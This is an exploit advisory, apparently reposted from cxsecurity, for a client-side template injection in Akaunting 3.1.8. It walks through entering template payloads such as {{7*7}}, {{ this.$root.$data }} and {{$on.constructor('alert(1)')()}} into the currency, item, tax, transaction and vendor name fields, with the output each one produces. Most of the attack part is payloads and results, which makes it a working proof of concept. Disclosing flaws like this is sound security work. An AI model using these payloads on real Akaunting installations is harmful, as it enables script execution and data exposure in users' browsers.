2024-6-3 02:50:36 Author: cxsecurity.com(查看原文) 阅读量:6 收藏
Akaunting 3.1.8 Client-Side Template Injection
# Exploit Title: Akaunting 3.1.8 - Client Side Template Injection CSTI # Exploit Author: tmrswrr # Date: 30/05/2024 # Vendor: https://akaunting.com/forum # Software Link: https://akaunting.com/apps/crm # Vulnerable Version(s): 3.1.8 1 ) Login with admin cred and go to : Currencies > New Currency https://127.0.0.1/Akaunting/1/settings/currencies 2 ) Write SSTI payload : {{ Object.keys(this) }} Name field 3 ) Save it 4 ) You will be see result : "_uid", "_isVue", "__v_skip", "_scope", "$options", "_renderProxy", "_self", "$parent", "$root", "$children", "$refs", > {{ this.$root.$data }} > "form": {}, "bulk_action": { "path": "currencies", "count": "", "value": "*", "message": "", "type": "", "show": false, "modal": false, "loading": false, "selected": [], > {{ Object.keys(this._self) }} > "_uid", "_isVue", "__v_skip", "_scope", "$options", "_renderProxy", "_self", "$parent", "$root", "$children", "$refs", > {{$on.constructor('alert(1)')()}} > You will be see alert box ======================================================================================= 1 ) Login with admin cred and go to : Items > New Item https://127.0.0.1/Akaunting/1/common/items 2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers 3 ) Save it 4 ) You will be see result : 49 ==================================================================================== 1 ) Login with admin cred and go to :Settings > Taxes > New Tax https://127.0.0.1/Akaunting/1/settings/taxes/1/edit 2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab ==================================================================================== 1 ) Login with admin cred and go to : Banking > Transactions > New Income https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income 2 ) Write SSTI payload : {{7*7}} Description field 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab ======================================================================================= 1 ) Login with admin cred https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit 2 ) Write SSTI payload : {{7*7}} Name field 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab > {{self}} >
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh